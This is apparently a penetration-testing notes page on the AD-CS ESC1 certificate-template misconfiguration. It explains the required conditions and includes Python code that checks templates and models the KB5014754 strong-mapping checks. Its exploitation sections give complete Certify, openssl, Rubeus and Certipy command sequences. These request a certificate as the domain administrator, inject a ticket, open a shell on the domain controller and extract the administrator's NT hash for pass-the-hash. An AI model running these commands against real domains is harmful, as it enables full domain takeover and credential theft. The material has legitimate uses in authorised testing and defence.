# ESC1

### What is AD-CS?

**AD-CS** (Active Directory Certificate Services) is Microsoft's internal PKI (Public Key Infrastructure): the certificate authority server role that a Windows enterprise deploys to issue and manage certificates for its domain.

AD-CS issues digital certificates to:

| Issued To | Used For                                                                                    |
| --------- | ------------------------------------------------------------------------------------------- |
| Users     | Authentication (smart card logon, certificate-based Kerberos), email signing and encryption |
| Computers | Machine authentication, TLS for services such as LDAPS, 802.1X VPN & Wi-Fi access           |
| Services  | TLS server certificates, code signing                                                       |

{% hint style="info" icon="file-certificate" %}
Think of AD-CS as the **"internal certificate authority for a Windows enterprise."** It's the system that decides who gets to prove their identity using a certificate instead of a password.
{% endhint %}

## What is ESC1?

ESC1 is a **misconfigured certificate template** vulnerability that allows a low-privileged domain user to **request a certificate for any account**, including a Domain Admin, and then authenticate to the domain as that account.

#### Conditions Required for ESC1 Abuse

All of the following must be true on the vulnerable template (and its CA):

1. The template has an **AD authentication EKU** enabled (any of the three described under Key Concepts)
2. **`ENROLLEE_SUPPLIES_SUBJECT`** is set in `msPKI-Certificate-Name-Flag`
3. **Low-privileged users** (for example Domain Users or Authenticated Users) have **Enroll** rights on the template, and the Enterprise CA lets them submit requests
4. **Manager approval** is disabled, so the request is issued immediately instead of being held as pending
5. **No authorized signatures** are required on the request

## Key Concepts

### Extended Key Usages (EKUs)

EKUs define what a certificate is *allowed to do*. For ESC1, one of these must be present:

#### Smart Card Logon — `1.3.6.1.4.1.311.20.2.2`

> "This certificate is allowed to be used for logging into a domain account."

* Allows a user to authenticate to AD using a **certificate instead of a password**
* Typically stored on a smart card or USB security key
* Requires a PIN to unlock the private key

#### Client Authentication — `1.3.6.1.5.5.7.3.2`

> "This certificate can be used to authenticate a client to a server."

* General-purpose certificate-based login
* **Not** limited to smart cards
* Accepted by the KDC for Kerberos certificate authentication (PKINIT), as are the Smart Card Logon and PKINIT Client Authentication EKUs

#### PKINIT Client Authentication — `1.3.6.1.5.2.3.4`

> "This certificate can be used to authenticate to Kerberos using public key cryptography."

* **PKINIT** = Public Key Cryptography for Initial Authentication in Kerberos
* Directly enables: **Certificate → Kerberos TGT** authentication

### ENROLLEE\_SUPPLIES\_SUBJECT

*This is the **root cause** of ESC1.*

**Normal behaviour:** The CA builds the Subject and SAN from the requesting account's AD object, so a certificate can only name the user who requested it.

**With this flag enabled:** The *requester* defines the Subject and SAN in the CSR, so a low-privileged user can claim "I am `administrator@l1nuxkid.dev`".

When combined with the right EKU and enroll permissions, this allows impersonation of **any domain account**.

### SAN (Subject Alternative Name)

The SAN field inside a certificate can store:

* **UPN** (User Principal Name), e.g. `administrator@l1nuxkid.dev`
* DNS name
* Email address

If the SAN contains the UPN `administrator@l1nuxkid.dev`, Active Directory maps the certificate to that account during authentication, regardless of who actually requested it. Since the May 2022 strong-mapping update (KB5014754) a domain controller may additionally require a matching SID inside the certificate; see the `-extension-sid` note in the Linux section.

## Exploiting ESC1 Using Windows

#### Step 1: Enumerate Certificate Authorities (CA)

```
certify.exe cas
```

#### Step 2: Find Vulnerable Templates

```
certify.exe find /vulnerable
certify.exe find
```

Look for templates where:

* `msPKI-Certificate-Name-Flag` includes `ENROLLEE_SUPPLIES_SUBJECT`
* EKU includes Client Authentication / Smart Card Logon / PKINIT
* Low-privileged users (Domain Users) have **Enroll** rights

<figure><img src="/files/RDbhlYpFUus9AazhZzxn" alt=""><figcaption></figcaption></figure>
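Certify and Certipy apply these checks for you; the following added example (my code, not Certify's or Certipy's) encodes the ESC1 conditions from this page as a function over a template's LDAP attributes, so you can see exactly which condition a template fails. Beyond the page's three authentication EKUs it also treats the Any Purpose EKU (`2.5.29.37.0`) and an empty EKU list as logon-capable, which is how Certipy classifies templates. The template dicts, the domain SID and the ACE model `(trustee SID, extended-right GUID)` are constructed for the example.

```python
"""Decide whether a certificate template meets every ESC1 condition.

Added example, not code from Certify or Certipy. Input dicts use the LDAP
attribute names of pKICertificateTemplate objects; the sample templates
below are constructed, not pulled from a real domain.
"""

# Bit in msPKI-Certificate-Name-Flag: the enrollee supplies Subject and SAN
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# Bit in msPKI-Enrollment-Flag: every request is held for manager approval
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002
# Control-access right GUID for Certificate-Enrollment (the "Enroll" permission)
ENROLL_RIGHT_GUID = "0e10c968-78fb-11d2-90d4-00c04f79dc55"

# EKUs the KDC accepts for certificate-based domain authentication
AUTH_EKUS = {
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose (also usable for logon)
}

# Principals whose Enroll right means "every domain account can enrol"
WELL_KNOWN_LOW_PRIV_SIDS = {"S-1-1-0", "S-1-5-11"}   # Everyone, Authenticated Users
LOW_PRIV_DOMAIN_RIDS = {513, 515}                    # Domain Users, Domain Computers


def is_low_priv_sid(sid: str) -> bool:
    """True for Everyone/Authenticated Users or a domain's Users/Computers group."""
    if sid in WELL_KNOWN_LOW_PRIV_SIDS:
        return True
    parts = sid.split("-")
    # Domain SIDs look like S-1-5-21-<a>-<b>-<c>-<rid>: 8 dash-separated parts
    return sid.startswith("S-1-5-21-") and len(parts) == 8 and int(parts[-1]) in LOW_PRIV_DOMAIN_RIDS


def template_allows_auth(template: dict) -> bool:
    """An empty EKU list means 'no restriction', which the KDC also accepts for logon."""
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    return not ekus or bool(ekus & AUTH_EKUS)


def esc1_blockers(template: dict) -> list:
    """Return the ESC1 conditions this template does NOT meet (empty list == ESC1)."""
    blockers = []
    if not template_allows_auth(template):
        blockers.append("no authentication EKU")
    if not template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        blockers.append("ENROLLEE_SUPPLIES_SUBJECT not set")
    if template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        blockers.append("manager approval required")
    if template.get("msPKI-RA-Signature", 0) > 0:
        blockers.append("authorized signature required")
    # "aces" models the template DACL as (trustee SID, extended-right GUID) allow ACEs
    enrollers = {sid for sid, guid in template["aces"] if guid.lower() == ENROLL_RIGHT_GUID}
    if not any(is_low_priv_sid(sid) for sid in enrollers):
        blockers.append("no low-privileged principal holds Enroll")
    return blockers


DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"  # constructed

# Constructed template: the classic ESC1 shape reported by `certify find /vulnerable`
VULNERABLE_TEMPLATE = {
    "name": "ESC1-User",
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.20.2.2"],
    "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "msPKI-Enrollment-Flag": 0x00000000,
    "msPKI-RA-Signature": 0,
    "aces": [(DOMAIN_SID + "-513", ENROLL_RIGHT_GUID),    # Domain Users: Enroll
             (DOMAIN_SID + "-512", ENROLL_RIGHT_GUID)],   # Domain Admins: Enroll
}

# Constructed template: same EKU and flag, but requests are pended for approval
# and only Domain Admins may enrol, so two ESC1 conditions are unmet
HARDENED_TEMPLATE = {
    "name": "Approved-User",
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS,
    "msPKI-RA-Signature": 0,
    "aces": [(DOMAIN_SID + "-512", ENROLL_RIGHT_GUID)],
}

if __name__ == "__main__":
    for t in (VULNERABLE_TEMPLATE, HARDENED_TEMPLATE):
        blockers = esc1_blockers(t)
        verdict = "ESC1" if not blockers else "not ESC1: " + ", ".join(blockers)
        print(f"{t['name']}: {verdict}")
```

Feeding the real attributes from an LDAP dump of `CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,...` into `esc1_blockers` gives the same verdict Certify prints, with the reason spelled out; clearing the `ENROLLEE_SUPPLIES_SUBJECT` bit or enabling manager approval on a template is what moves it from the first result to the second.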

#### Step 3: Request a Certificate as Administrator

Our current user has **Enroll** rights and `ENROLLEE_SUPPLIES_SUBJECT` is set, so we can request a certificate whose SAN names **any user**.

```
certify.exe request /ca:CA-NAME /template:TEMP_NAME_HERE /altname:administrator /sidextension:S-1-5-SNIP- /domain:l1nuxkid.dev
```

* Certify prints the RSA private key and the certificate as PEM blocks. Save them as `esc1.pem`; the conversion below expects the key on its own in `esc1.key`, so either split the key block out or drop `-inkey esc1.key` and let openssl read the key from `esc1.pem`.

#### Step 4: Convert Certificate to PFX

```
openssl pkcs12 -in esc1.pem -inkey esc1.key -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc1.pfx
```

* Enter a password when prompted (e.g. `l1nuxkid`)

#### Step 5: Request a TGT with Rubeus

```
Rubeus.exe asktgt /user:administrator /domain:l1nuxkid.dev /certificate:esc1.pfx /password:l1nuxkid /dc:dc01.l1nuxkid.dev /nowrap /ptt
```

#### Step 6: Verify & Use

```
# Verify the ticket was injected
klist

# Spawn a remote shell on the DC
winrs -r:dc01.l1nuxkid.dev cmd.exe
```

## Exploiting ESC1 Using Linux

#### Step 1: Find Vulnerable Templates

```
# -hashes follows the impacket LMHASH:NTHASH order; the LM half may be left empty (":<NT>")
certipy find -vulnerable -u username@l1nuxkid.dev -hashes "LM:NT" -dc-ip <DC_IP> -stdout
```

<figure><img src="/files/hghMeiAIEhYRVzdJQXcN" alt=""><figcaption></figcaption></figure>

#### Step 2: Request Certificate as Administrator

```
certipy req -u username@l1nuxkid.dev -hashes "LM:NT" -dc-ip dc01.l1nuxkid.dev -target dc01.l1nuxkid.dev -ca 'CA_NAME' -template 'TEMPLATE_NAME' -upn administrator@l1nuxkid.dev -extension-sid <SNIP> -out esc1-certipy_cert -debug
```

The `-extension-sid` flag embeds the target account's objectSid in the certificate's `szOID_NTDS_CA_SECURITY_EXT` extension (OID `1.3.6.1.4.1.311.25.2`). Domain controllers patched with KB5014754 (May 2022) use that extension for **strong certificate mapping**: in Full Enforcement mode a certificate that only carries a UPN in the SAN is rejected (absent an explicit strong `altSecurityIdentities` mapping), so without the SID the ESC1 certificate cannot be used to log on. Always include the SID extension when targeting patched environments.
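To make the strong-mapping caveat concrete, here is an added example (my code, not Certipy's or Microsoft's) that models the KDC's mapping decision for the three values of the `StrongCertificateBindingEnforcement` registry setting introduced by KB5014754: Disabled (0), Compatibility (1) and Full Enforcement (2). It shows why an ESC1 certificate with only a UPN in the SAN still works in Compatibility mode (unless it predates the account), fails in Full Enforcement, and why embedding the target's SID fixes that. The accounts, certificates and domain SID are constructed; explicit `altSecurityIdentities` mappings are not modelled.

```python
"""Model the DC's certificate-to-account mapping decision after KB5014754.

Added example, not Certipy or Microsoft code. The three modes are the values
of the KDC registry value StrongCertificateBindingEnforcement; accounts and
certificates below are constructed.
"""
from dataclasses import dataclass
from datetime import datetime
from typing import List, Optional, Tuple

# OID of szOID_NTDS_CA_SECURITY_EXT, the extension that carries the objectSid
# (what `certipy req -extension-sid` and `Certify request /sidextension` embed)
SID_EXTENSION_OID = "1.3.6.1.4.1.311.25.2"

DISABLED, COMPATIBILITY, FULL_ENFORCEMENT = 0, 1, 2


@dataclass
class Account:
    upn: str
    sid: str
    when_created: datetime


@dataclass
class Cert:
    san_upn: str                          # weak mapping: UPN in the SAN
    not_before: datetime
    sid_extension: Optional[str] = None   # strong mapping: SID in SID_EXTENSION_OID


def kdc_decision(cert: Cert, accounts: List[Account], mode: int) -> Tuple[bool, str]:
    """Return (accepted, reason) for a PKINIT logon with this certificate."""
    target = next((a for a in accounts if a.upn.lower() == cert.san_upn.lower()), None)
    if target is None:
        return False, "no account with UPN %s" % cert.san_upn
    if mode == DISABLED:
        return True, "weak UPN mapping accepted, strong binding checks disabled"
    if cert.sid_extension is not None:
        # Checked in Compatibility and Full Enforcement alike: the SID must be the target's
        if cert.sid_extension == target.sid:
            return True, "strong mapping: %s extension matches %s" % (SID_EXTENSION_OID, target.upn)
        return False, "SID extension %s does not match %s" % (cert.sid_extension, target.upn)
    # No SID extension, so only the weak UPN mapping is available
    if mode == FULL_ENFORCEMENT:
        return False, "full enforcement: certificate cannot be strongly mapped"
    if cert.not_before < target.when_created:
        return False, "compatibility mode: certificate predates the account"
    return True, "compatibility mode: weak mapping accepted (KDC logs a warning)"


# Constructed directory: the impersonation target and its SID
DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"
ACCOUNTS = [
    Account("administrator@l1nuxkid.dev", DOMAIN_SID + "-500", datetime(2023, 1, 10)),
]

# ESC1 certificate requested without the SID extension
CERT_NO_SID = Cert("administrator@l1nuxkid.dev", datetime(2024, 6, 1))
# Same request with -extension-sid pointing at the administrator's objectSid
CERT_WITH_SID = Cert("administrator@l1nuxkid.dev", datetime(2024, 6, 1), DOMAIN_SID + "-500")
# Same request, but the requester supplied some other account's SID
CERT_WRONG_SID = Cert("administrator@l1nuxkid.dev", datetime(2024, 6, 1), DOMAIN_SID + "-1105")
# Certificate whose NotBefore is earlier than the account's creation time
CERT_BACKDATED = Cert("administrator@l1nuxkid.dev", datetime(2022, 1, 1))

if __name__ == "__main__":
    cases = (("no SID", CERT_NO_SID), ("matching SID", CERT_WITH_SID),
             ("wrong SID", CERT_WRONG_SID), ("backdated", CERT_BACKDATED))
    for name, cert in cases:
        for mode in (DISABLED, COMPATIBILITY, FULL_ENFORCEMENT):
            ok, why = kdc_decision(cert, ACCOUNTS, mode)
            print(f"{name:13} mode={mode}: {'ACCEPT' if ok else 'REJECT'} ({why})")
```

Running it prints the matrix a tester needs before choosing flags: the matching-SID certificate is accepted in every mode, the SID-less one only in Disabled and Compatibility mode, and a backdated SID-less certificate only in Disabled mode, which is why the `-extension-sid` value must be the impersonated account's real objectSid rather than the requesting user's.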

#### Step 3: Authenticate & Retrieve NTLM Hash

```
certipy auth -pfx esc1-certipy_cert.pfx -dc-ip <DC_IP>
```

This performs **UnPAC-the-Hash**: Certipy authenticates with the certificate via PKINIT, obtains a TGT for the impersonated account (saved as a `.ccache` for later Kerberos use) and then extracts the account's NT hash from the `PAC_CREDENTIAL_INFO` buffer of the PAC, which can be used for Pass-the-Hash.

### Tools Reference

| Tool                                                  | Platform      | Purpose                          |
| ----------------------------------------------------- | ------------- | -------------------------------- |
| [`Certify.exe`](https://github.com/GhostPack/Certify) | Windows       | Enumerate & request certificates |
| [`Rubeus.exe`](https://github.com/ghostpack/rubeus)   | Windows       | Request TGT from certificate     |
| [`Certipy`](https://github.com/ly4k/Certipy)          | Linux         | All-in-one AD-CS attack tool     |
| [`openssl`](https://github.com/openssl/openssl)       | Linux/Windows | Convert PEM → PFX                |


